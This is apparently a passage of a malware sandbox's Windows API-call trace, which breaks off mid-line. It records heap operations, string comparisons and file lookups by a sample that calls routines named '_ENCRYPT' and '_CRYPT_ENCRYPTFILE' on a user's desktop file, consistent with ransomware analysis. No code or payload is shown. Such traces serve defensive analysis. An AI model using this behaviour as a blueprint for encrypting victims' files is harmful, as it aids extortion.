[0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696a48 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.221] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0076.222] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.222] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.222] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0076.222] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.222] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.222] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0076.222] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.222] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.222] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.222] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.222] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.222] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.222] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0076.222] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0076.222] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.222] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0076.222] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.222] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0076.222] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.222] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0076.222] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.222] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x76e300, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0076.223] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0076.223] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0076.223] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0076.223] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.223] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.223] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0076.223] CloseHandle (hObject=0x140) returned 1 [0076.223] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0076.223] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.223] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0076.223] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0076.223] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.223] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0076.223] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.223] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.223] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0076.223] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0076.223] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.223] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0076.224] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0076.224] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0076.224] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0076.224] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0076.224] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0076.224] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0076.224] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0076.224] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0076.224] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0076.224] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0076.224] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0076.224] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0076.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0076.224] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0076.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690740 [0076.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0076.224] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0076.224] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0076.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0076.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0076.224] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0076.224] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0076.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0076.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d860 [0076.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0076.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690960 [0076.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0076.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0076.225] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0076.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0076.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0076.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0076.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6969c0 [0076.225] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0076.225] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0076.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6a8 [0076.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0076.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0076.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d838 [0076.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0076.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0076.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0076.226] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x394ea870, ftCreationTime.dwHighDateTime=0x1d5e43a, ftLastAccessTime.dwLowDateTime=0xdee48600, ftLastAccessTime.dwHighDateTime=0x1d5d905, ftLastWriteTime.dwLowDateTime=0xdee48600, ftLastWriteTime.dwHighDateTime=0x1d5d905, nFileSizeHigh=0x0, nFileSizeLow=0x110a7, dwReserved0=0x0, dwReserved1=0x657690, cFileName="6iBbdX1qsRyDlZ.swf", cAlternateFileName="6IBBDX~1.SWF")) returned 0x6b89b8 [0076.226] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0076.226] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0076.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d068 [0076.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0076.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0076.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d630 [0076.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0076.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0076.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0076.226] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x394ea870, ftCreationTime.dwHighDateTime=0x1d5e43a, ftLastAccessTime.dwLowDateTime=0xdee48600, ftLastAccessTime.dwHighDateTime=0x1d5d905, ftLastWriteTime.dwLowDateTime=0xdee48600, ftLastWriteTime.dwHighDateTime=0x1d5d905, nFileSizeHigh=0x0, nFileSizeLow=0x110a7, dwReserved0=0x0, dwReserved1=0x657690, cFileName="6iBbdX1qsRyDlZ.swf", cAlternateFileName="6IBBDX~1.SWF")) returned 0x6b89b8 [0076.226] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0076.227] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.227] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0076.227] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0076.227] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0076.227] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.227] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0076.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iBbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BbdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bdX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dX1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qsRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sRyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RyDlZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.229] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.229] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0076.229] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0076.229] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0076.229] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0076.229] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0076.229] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db80 [0076.229] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0076.229] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0076.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, 